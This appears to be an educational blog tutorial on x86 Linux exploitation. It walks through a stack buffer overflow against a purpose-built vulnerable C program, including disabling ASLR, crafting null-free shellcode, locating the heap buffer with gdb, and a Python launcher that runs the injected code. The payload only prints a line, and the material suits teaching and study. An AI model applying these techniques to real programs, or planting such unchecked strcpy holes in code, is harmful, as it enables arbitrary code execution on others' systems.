Binary-level exploits — How to execute input data as machine code

Exploits can address any layer of an application. The most fundamental ones are those that target the binary level and allow an attacker to manipulate the machine code of the underlying system process. These are tricky to design as they depend on the hardware architecture of the actual machine, yet ultimately powerful as they undermine any higher-level security mechanism.

This post gives a little insight into the principles and challenges of constructing binary shell code and bringing it to execution on a target system.

Prerequisites

The platform used in this example is a Linux system running on an IA-32 architecture. Programs are either C or assembly, with GCC and NASM used for translation.

By default, a modern Linux configuration has ASLR enabled, which randomizes the offsets of a process’ stack and heap. The effects of ASLR can be easily demonstrated by repeatedly running a little program that allocates memory on the stack (local variable a) and on the heap (b) and prints their addresses:

#include <stdio.h>
#include <stdlib.h>

void foo(int dummy) {
    char a;
    char *b = malloc(1);
    printf("Stack in %p\tHeap in %p\n", &a, b);
    if (dummy > 0)
        foo(dummy - 1);
}

int main() {
    foo(10);
    return 0;
}

When running the program with ASLR enabled, it will print out different addresses for a and/or b with every run. To make things easier for the sake of this demo, ASLR will be disabled with the following line (you need to have root privileges):

sudo sysctl -w kernel.randomize_va_space=0

Verify the effect of the settings by re-running the program above — the printed addresses remain exactly the same!

The target program

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void msg1() {
    printf("Argc is even.\n");
}

void msg2() {
    printf("Argc is odd.\n");
}

int main(int args, char* argv[]) {
    // Use struct as compiler might rearrange order of local vars
    struct {
        char buf[16];
        void (*jump)(void);
    } locals;
    char* heapbuf = malloc(64);

    if ((args % 2) == 0)
        locals.jump = &msg1;
    else
        locals.jump = &msg2;

    strcpy(locals.buf, argv[1]);
    strcpy(heapbuf, argv[2]);

    locals.jump();

    return 0;
}

The program above is admittedly an easy target. It was designed to show off the techniques we’re using below. While we’ll have a harder time attacking programs in the wild, the principles remain the same.

Since this example assumes an IA-32 architecture, the program must be compiled with the corresponding switch enabled. Further, we must disable some safeguards that prevent what we’re intending to do (that is, executing data segments) and which the compiler usually enables by default:

gcc -Wall -g -m32 -z execstack -o heapexec heapexec.c

The observable behavior of the program is simple — it prints a message whether the number of passed arguments is odd or even and exits. Internally, there is a function for each of the two cases (odd or and even), which prints the corresponding text. Branching is done by writing the address of one of the two functions to a local variable (jump), which is called further down in the program text.

After updating the jump variable and before actually calling it, the program copies the first two arguments to a local buffer (i.e. on the stack) and to a heap-allocated buffer, respectively.

This construction gives a clue on how the attack vector will look like — the jump variable must be overwritten to point to the shellcode that is passed as an argument.

Smashing the stack to redirect execution flow

By design, buf and jump are fields of a struct, that is a local variable in function main (thus residing on the stack). The struct was chosen in this example, to ensure that the order of both fields remains the same in memory, as it is in the source code — otherwise it is likely that the compiler will re-arrange their order for memory alignment.

Since the first argument that is passed to the program is copied to buf, an overflow of this field will overwrite the subsequent member of the struct — jump — and thus effectively direct program execution to any memory location. An overflow is possible, since the notoriously insecure strcpy() function is used to copy the arguments, which does not verify string termination or the size of the destination buffer.

Let’s try this within the boundaries of the original program. By crafting an argument that overflows buf, we set the value of jump to the address of function msg2(). That is, the program will always print a message that the number of arguments is odd, independently of the actual number of arguments.

To find out the address of msg2(), the tool objdump comes handy:

$ objdump -d heapexec
...
080484e1 <msg2>:
80484e1: 55                        push %ebp
80484e2: 89 e5                     mov %esp,%ebp
80484e4: 83 ec 18                  sub $0x18,%esp
80484e7: c7 04 24 2e 86 04 08      movl $0x804862e,(%esp)
80484ee: e8 ad fe ff ff            call 80483a0 <puts@plt>
80484f3: c9                        leave
80484f4: c3                        ret
...

objdump shows that function msg2() starts at address 0x080484e1. Therefore, the first argument must contain 16 bytes to fill up the allocated space for buf, followed by 4 bytes containing this address.

Since non-ASCII characters can’t be encoded on the comand line, a little Python script is helpful to print out the hex values of the address. The order of bytes must be reversed, due to IA-32’s little-endian architecture.

The following snippet shows the output of the program with the first argument below the 16 byte limit, and subsequently with the Python-generated sequence that overflows buf and overwrites jump with the address of function msg2():

$ ./heapexec one two three
Argc is even.
$ ./heapexec `python -c 'print "AAAABBBBCCCCDDDD" + "\xe1\x84\x04\x08"'` two three
Argc is odd.

It works! Even though the number of arguments has not changed, msg2() is called instead of msg1(). We can now direct program flow to an arbitrary address in memory. The next goal is to use the technique to execute some custom shellcode on the heap.

Crafting the shell code

The shellcode that is to be injected into the target process shall print the line “Shelled.” on the console and exit. In order to avoid the overhead that high-level language compilers introduce into the machine code, we start right off with tiny assembly code. An assembly program that shows the described behavior will typically look like this:

        SECTION .data         ; data segment
msg:    db "Shelled.",10      ; msg to be printed, CR
len:    equ $-msg             ; length of the message

        SECTION .text         ; code segment
        global main
main:                         ; entry point
        mov    edx,len        ; length of msg to be printed
        mov    ecx,msg        ; pointer to msg
        mov    ebx,1          ; output on terminal
        mov    eax,4          ; sysout call
        int    0x80           ; interrupt

        mov    ebx,0          ; exit code
        mov    eax,1          ; exit call
        int    0x80           ; interrupt

To be used as shellcode, some optimization is required. First, we eliminate the data segment and squeeze the constant with the message to be printed into the code segment, right before the entry point of the program (label main). This makes the code more compact and saves us address calculations across segment boundaries. Further, the dynamic calculation of the message length is removed and replaced by a constant. Here is the resulting code:

        SECTION .text          ; code segment
        global main
msg:    db "Shelled.",10       ; msg to be printed, CR

main:                          ; entry point
        mov    edx,9           ; length of msg (8 char + CR)
        mov    ecx,$-14        ; pointer to msg
        mov    ebx,1           ; output on terminal
        mov    eax,4           ; sysout call
        int    0x80            ; interrupt

        mov    ebx,0           ; exit code
        mov    eax,1           ; exit call
        int    0x80            ; interrupt

What probably isn’t clear at this point is where the statement mov ecx,$-14 in line 7 comes from. But let’s first verify that the code does what it should:

$ nasm -f elf32 printline2.asm
$ gcc -Wall -m32 -s printline2.o -o printline2
$ ./printline2
Shelled.

Great. Now let’s have a look at the machine code that NASM has produced:

$ objdump -d printline2.o
printline2.o:     file format elf32-i386
Disassembly of section .text:
00000000 <msg>:
0:    53                       push   %ebx
1:    68 65 6c 6c 65           push   $0x656c6c65
6:    64 2e 0a ba 09 00 00     fs or  %cs:%fs:0x9(%edx),%bh
d:    00
00000009 <main>:
9:    ba 09 00 00 00           mov    $0x9,%edx
e:    b9 00 00 00 00           mov    $0x0,%ecx
13:   bb 01 00 00 00           mov    $0x1,%ebx
18:   b8 04 00 00 00           mov    $0x4,%eax
1d:   cd 80                    int    $0x80
1f:   bb 00 00 00 00           mov    $0x0,%ebx
24:   b8 01 00 00 00           mov    $0x1,%eax
29:   cd 80                    int    $0x80

This snippet gives us the answer to the question from above: The statement that loads the address of the message into register ecx subtracts from the current address the difference to the address where the message starts. Since the message is located at the very beginning, the calculation yields the relative address 0, which is loaded into register ecx: 0xe – 14 (decimal value of 0xe) = 0.

At the same time, the machine code reveals another challenge — there are plenty of zeros in it! This is problematic for any shellcode, as it is often processed by string operations which interpret zeros as termination symbols and cut off anything that follows the first zero encounter. This holds true for our target program as well, where arguments are copied into buffers using the strcpy() function. For this reason, any shellcode that is processed as a string must be stripped off its zeros — without harming its semantics.

Looking at the machine code shows that all zero bytes appear as part of literals that are copied to registers as function parameters. To this end, we take advantage of the IA-32 architecture’s backward compatibility. While its standard registers are 32 bit wide, it also supports the use of 16-bit registers that were used in processor architectures prior to the 80386. In fact, the 16-bit registers live on as the lower half of their 32-bit counterparts and can be accessed by omitting the leading E of the register name (e.g. AX instead of EAX). The 16-bit registers can be subdivided again into 8-bit halfs, designated as “high” and “low”. For instance, the 16-bit AX register can be split up into AH and AL, where AL is the least significant byte of the AX (and EAX!) register.

Since all of the literals that appear in the code snippet are smaller than 256, it is sufficient to use the 8-bit register portions. By using possibly small registers, we avoid the need to fill up the extra bytes of larger registers with zeros that would otherwise appear in the assembly code and harm its usability as shellcode.

Remember, though, that even when using 16-bit or 8-bit register portions, the program is still a 32-bit executable that will load and use the entire 32-bit of the corresponding E(extended) register. For this reason, it is smart to xor-out a 32-bit register before writing to a part of it. This way, artefacts in the untouched parts of the 32-bit register will not affect subsequent computations.

With these considerations in mind, the resulting assembly code looks like this:

        SECTION .text          ; code segment
        global main 

        db "Shelled.",10       ; msg to be printed, CR

main:                          ; entry point
        xor    edx, edx        ; zero-out register
        mov    dl,9            ; length of msg (8 char + CR)
        mov    ecx, $-13       ; pointer to msg
        xor    ebx, ebx        ; zero-out register
        mov    bl,1            ; output on terminal
        xor    eax, eax        ; zero-out register
        mov    al,4            ; sysout call
        int    0x80            ; interrupt

        xor    ebx, ebx        ; zero-out register	
        mov    bl,1            ; exit code
        xor    eax, eax        ; zero-out register
        mov    al,1            ; exit call
        int    0x80            ; interrupt

So far so good, now let’s look at it in binary form:

$ nasm -f elf32 printline3.asm
$ objdump -d printline3.o
printline3.o:     file format elf32-i386
Disassembly of section .text:
00000000 <main-0x9>:
0:    53                       push   %ebx
1:    68 65 6c 6c 65           push   $0x656c6c65
6:    64 2e 0a 31              fs or  %cs:%fs:(%ecx),%dh
00000009 <main>:
9:    31 d2                    xor    %edx,%edx
b:    b2 09                    mov    $0x9,%dl
d:    b9 00 00 00 00           mov    $0x0,%ecx
12:   31 db                    xor    %ebx,%ebx
14:   b3 01                    mov    $0x1,%bl
16:   31 c0                    xor    %eax,%eax
18:   b0 04                    mov    $0x4,%al
1a:   cd 80                    int    $0x80
1c:   31 db                    xor    %ebx,%ebx
1e:   b3 01                    mov    $0x1,%bl
20:   31 c0                    xor    %eax,%eax
22:   b0 01                    mov    $0x1,%al
24:   cd 80                    int    $0x80

There are (almost) no zeros left! The only ones still there are at address 0xd. A closer look shows that this line loads the address of the message constant into register ECX. In this case, it is not possible to resort to smaller registers, since an absolute address is used here which is 32 bits long. This address is all zero in the code snippet above (0x00000000), as it is unlinked object code and the message constant occupies the very first bytes. For the shellcode, this zero address must be replaced by an actual address in the target process, which will finally leave us with the desired zero-free machine code.

Pointing the EIP to the heap

At this point, we have all the tools to execute input data: a carefully crafted shell code that will be passed as an argument to the target program, and a technique to redirect execution to the shellcode. The missing link is a tiny, yet crucial, information — the actual address where the shellcode resides in memory.

From the target program we know that the second argument — which will carry the shellcode — is copied to heap-allocated memory in the heapbuf variable (allocated by the malloc() function). Since heapbuf is allocated at runtime, we cannot directly determine its address by looking at the static machine code. The right tool at this point is the GNU debugger, which allows to inspect the program during its execution.

After starting gdb, we proceed stepwise until the malloc()-statement has been executed and can then determine the address of heapbuf:

$ gdb -q heapexec
Reading symbols from heapexec...done.
(gdb) start
Temporary breakpoint 1 at 0x8048505: file heapexec.c, line 13.
Starting program: heapexec
Temporary breakpoint 1, main (args=1, argv=0xffffd604) at heapexec.c:13
13    int main(int args, char* argv[]) {
(gdb) step
19        char* heapbuf = malloc(64);
(gdb) step
21        if ((args % 2) == 0)
(gdb) p heapbuf
$1 = 0x804b008 ""

The address of the variable heapbuf is thus 0x0804b008. We can now construct the complete first argument for the target program. It needs to begin with 16 characters to fill up locals.buf, followed by the address of the first instruction that shall be executed. Taking 0x0804b008 as the offset, we add 9 bytes, which is the length of the string (including CR) that is located at the beginning of the shell code. The first instruction is thus at address 0x0804b011.

The second argument for the target program is the actual shell code. It needs to be updated with the address of message string, which is identical to the address of heapbuf, as the shell code begins with it. Note that the byte order of the memory addresses in the shell code have to be reversed due to the little-endian processor architecture.

Since hex code is hard to encode on the command line, a little Python script helps to start the target program and to pass the prepared arguments:

#!/usr/bin/env python

import struct
from subprocess import call

arg1 = "QQQQYYYYWWWWRRRR\x11\xb0\x04\x08"
arg2 = "\x53\x68\x65\x6C\x6C\x65\x64\x2E\x0A" + \
       "\x31\xD2" + \
       "\xB2\x09" + \
       "\xB9\x08\xB0\x04\x08" + \
       "\x31\xDB" + \
       "\xB3\x01" + \
       "\x31\xC0" + \
       "\xB0\x04" + \
       "\xCD\x80" + \
       "\x31\xDB" + \
       "\xB3\x01" + \
       "\x31\xC0" + \
       "\xB0\x01" + \
       "\xCD\x80"

print "Calling program 'heapexec'..."
call(["./heapexec", arg1, arg2])

Starting the Python script yields the desired result:

$ ./progcall.py
Calling program 'heapexec'...
Shelled.

Success! Instead of printing the number of arguments, the program writes the injected string “Shelled.” to the command line. Using the specifically crafted arguments, we have succeeded to completely manipulate the behavior of this (vulnerable) program. While  printing out some string seems harmless, it is clear that the same approach can be used to insert arbitrary code that will be executed with the privileges of the original program.